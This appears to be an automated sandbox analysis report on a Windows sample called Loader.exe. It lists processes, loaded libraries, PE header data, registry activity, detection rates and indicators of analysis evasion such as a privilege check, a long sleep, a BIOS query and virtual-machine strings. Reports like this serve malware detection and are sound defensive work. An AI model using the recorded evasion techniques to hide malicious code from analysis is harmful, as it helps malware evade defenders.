Source: C:\Users\user\Desktop\Loader.exe	Command line argument: MZx	0_2_00192198
Source: C:\Users\user\Desktop\Loader.exe	Command line argument: MZx	0_2_00192198

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe	ReversingLabs: Detection: 42%
Source: Loader.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Loader.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Loader.exe

Static PE information: real checksum: 0x8f2e3 should be: 0x9c6d3

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00192198 push eax; ret	0_2_001922BF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00196D75 push ecx; ret	0_2_00196D88
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_0020718D push esp; ret	0_2_0020718E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00192198 push eax; ret	2_2_001922BF
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_00196D75 push ecx; ret	2_2_00196D88
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00449C8D push esp; ret	3_2_00449C8E

Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\Desktop\Loader.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_3-19242

Source: C:\Users\user\Desktop\Loader.exe

API coverage: 4.0 %

Source: C:\Users\user\Desktop\Loader.exe TID: 612

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001A9DAA FindFirstFileExW,		0_2_001A9DAA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001A9DAA FindFirstFileExW,		2_2_001A9DAA

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Loader.exe, 00000003.00000002.2304373806.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2304373806.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
